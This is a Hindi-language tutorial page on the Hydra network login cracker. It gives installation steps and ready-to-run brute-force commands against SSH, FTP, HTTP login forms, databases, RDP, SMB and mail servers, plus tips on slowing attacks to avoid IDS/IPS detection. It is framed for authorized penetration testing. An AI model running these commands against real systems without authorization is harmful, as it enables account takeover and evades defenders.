🐍 Hydra - Network Login Cracker
🔑 Password Cracking 🌐 Network Attacks ⚡ Multi-Protocol
Category: 4️⃣ Password Attacks
📝 Description
Hydra (THC-Hydra) दुनिया का सबसे लोकप्रिय नेटवर्क लॉगिन क्रैकर है। यह एक तेज और पैरेलल (parallel) लॉगिन क्रैकर है जो 50+ नेटवर्क प्रोटोकॉल को सपोर्ट करता है। Hydra ब्रूटफोर्स और डिक्शनरी अटैक के माध्यम से यूजरनेम और पासवर्ड क्रैक कर सकता है। यह SSH, FTP, HTTP, HTTPS, MySQL, PostgreSQL, RDP, SMB, Telnet, SMTP, और कई अन्य सर्विसेज पर अटैक कर सकता है।
विशेषता: Hydra की सबसे बड़ी खासियत है इसकी स्पीड और मल्टी-थ्रेडिंग। यह एक साथ कई कनेक्शन बना सकता है और बहुत तेजी से पासवर्ड टेस्ट कर सकता है। यह पेनिट्रेशन टेस्टर्स के लिए एक जरूरी टूल है।
📦 Installation
Kali Linux (पहले से इंस्टॉल):
hydra -h
Ubuntu/Debian:
sudo apt update sudo apt install hydra -y
macOS (Homebrew):
brew install hydra
GitHub से इंस्टॉल:
git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make sudo make install
💻 Common Commands (उदाहरण सहित)
📌 Hydra का सबसे आम सिंटैक्स: hydra -l username -P password_list.txt target protocol
🔹 1. SSH ब्रूटफोर्स - सिंगल यूजर:
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
🔹 2. SSH ब्रूटफोर्स - मल्टीपल यूजर:
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
🔹 3. FTP ब्रूटफोर्स:
hydra -l admin -P passwords.txt ftp://192.168.1.100
🔹 4. HTTP POST फॉर्म ब्रूटफोर्स - लॉगिन पेज:
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
🔹 5. HTTP GET फॉर्म ब्रूटफोर्स:
hydra -l admin -P passwords.txt 192.168.1.100 http-get-form "/login.php:user=^USER^&pass=^PASS^:F=error"
🔹 6. MySQL डेटाबेस ब्रूटफोर्स:
hydra -l root -P passwords.txt mysql://192.168.1.100
🔹 7. RDP (Windows Remote Desktop) ब्रूटफोर्स:
hydra -l Administrator -P passwords.txt rdp://192.168.1.100
🔹 8. SMB (Windows File Sharing) ब्रूटफोर्स:
hydra -l administrator -P passwords.txt smb://192.168.1.100
🔹 9. Telnet ब्रूटफोर्स:
hydra -l root -P passwords.txt telnet://192.168.1.100
🔹 10. SMTP ब्रूटफोर्स (Email Server):
hydra -l user@domain.com -P passwords.txt smtp://192.168.1.25
🔹 11. पोर्ट नंबर स्पेसिफाई करना:
hydra -l root -P passwords.txt -s 2222 ssh://192.168.1.100
🔹 12. थ्रेड्स की संख्या बढ़ाना (तेज अटैक):
hydra -l root -P passwords.txt -t 16 ssh://192.168.1.100
🔹 13. डिले सेट करना (स्लो अटैक - IDS/IPS से बचने के लिए):
hydra -l root -P passwords.txt -w 3 ssh://192.168.1.100
🔹 14. आउटपुट को फाइल में सेव करना:
hydra -l root -P passwords.txt -o results.txt ssh://192.168.1.100
🔹 15. वर्बोस मोड (डिटेल्ड आउटपुट):
hydra -l root -P passwords.txt -V ssh://192.168.1.100
🔹 16. रेस्टोर मोड (पिछले अटैक से जारी रखना):
hydra -l root -P passwords.txt -R ssh://192.168.1.100
🎯 Hydra के सपोर्टेड प्रोटोकॉल:
- SSH, FTP, HTTP, HTTPS: सबसे कॉमन
- MySQL, PostgreSQL, Oracle, MSSQL: डेटाबेस
- RDP, SMB, VNC: Windows और रिमोट डेस्कटॉप
- Telnet, SMTP, POP3, IMAP: पुराने प्रोटोकॉल और ईमेल
- LDAP, SNMP, Redis, MongoDB: एंटरप्राइज
- Teamspeak, Cisco, Asterisk: VoIP और नेटवर्क डिवाइस
🎯 Use Cases (उपयोग के तरीके)
- पेनिट्रेशन टेस्टिंग: SSH, FTP, RDP, MySQL जैसी सर्विसेज पर कमजोर पासवर्ड ढूँढना।
- नेटवर्क सिक्योरिटी ऑडिट: कंपनी के सर्वर पर कमजोर पासवर्ड की जांच करना।
- वेब एप्लीकेशन टेस्टिंग: लॉगिन पेज पर ब्रूटफोर्स अटैक करना।
- सोशल इंजीनियरिंग टेस्ट: कर्मचारियों के पासवर्ड की ताकत जांचना।
- फॉरेंसिक जांच: कब्जे में लिए गए सर्वर पर पासवर्ड रिकवर करना।
⚙️ Key Features (मुख्य विशेषताएँ)
- ✔️ 50+ नेटवर्क प्रोटोकॉल सपोर्ट
- ✔️ मल्टी-थ्रेडिंग (तेज अटैक)
- ✔️ डिक्शनरी अटैक और ब्रूटफोर्स
- ✔️ सिंगल यूजर या यूजरलिस्ट सपोर्ट
- ✔️ HTTP GET और POST फॉर्म सपोर्ट
- ✔️ कस्टम फेल्ड स्ट्रिंग डिटेक्शन
- ✔️ कुकी और प्रॉक्सी सपोर्ट
- ✔️ IPv6 सपोर्ट
- ✔️ रेस्टोर फंक्शन (बीच से जारी रखना)
- ✔️ आउटपुट फाइल में सेव करना
- ✔️ क्रॉस-प्लेटफॉर्म (Linux, Windows, macOS)
📌 HTTP POST फॉर्म के लिए सिंटैक्स:
hydra -l admin -P passwords.txt target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=invalid"
- F=invalid: "invalid" स्ट्रिंग फेल्ड लॉगिन दिखाती है
- S=success: "success" स्ट्रिंग सक्सेसफुल लॉगिन दिखाती है
- C=/page: पहले कुकी लेने के लिए
📌 Hydra vs Medusa:
- Hydra: ज्यादा प्रोटोकॉल सपोर्ट, थ्रेडेड, पॉपुलर
- Medusa: सिंपल, स्टेबल, सीमित प्रोटोकॉल
- अनुशंसा: Hydra ज्यादा फीचर्स के लिए, Medusa सिंपल टास्क के लिए
📌 Hydra के लिए सुझाव:
- हमेशा -t (थ्रेड्स) को सावधानी से सेट करें (ज्यादा थ्रेड्स सर्वर को क्रैश कर सकते हैं)
- IDS/IPS से बचने के लिए -w (डिले) का उपयोग करें
- बड़ी वर्डलिस्ट के लिए -t बढ़ाएं लेकिन सर्वर लोड का ध्यान रखें
- लॉगिन फॉर्म के लिए "incorrect" या "error" स्ट्रिंग सही से पहचानें
🔗 Official Resources
- GitHub Repository: https://github.com/vanhauser-thc/thc-hydra
- Official Website: https://www.thc.org/thc-hydra/
- Kali Linux Tools: Kali Hydra Page
🔧 Related Tools (समान उपकरण)
- Medusa: पैरेलल नेटवर्क लॉगिन क्रैकर
- John the Ripper: पासवर्ड क्रैकिंग टूल
- Hashcat: GPU-आधारित पासवर्ड क्रैकर
- Ncrack: हाई-स्पीड नेटवर्क ऑथेंटिकेशन क्रैकर
- Burp Suite Intruder: HTTP फॉर्म ब्रूटफोर्स के लिए
- Wfuzz: वेब फजिंग टूल
⚠️ Important Note (सावधानी)
Hydra एक शक्तिशाली ब्रूटफोर्स टूल है जो सर्वर पर भारी लोड डाल सकता है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के ब्रूटफोर्स करना कानूनी अपराध है। प्रोडक्शन सर्वर पर अटैक करते समय -w (delay) पैरामीटर का उपयोग करें। हमेशा अपने खुद के सर्वर या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें।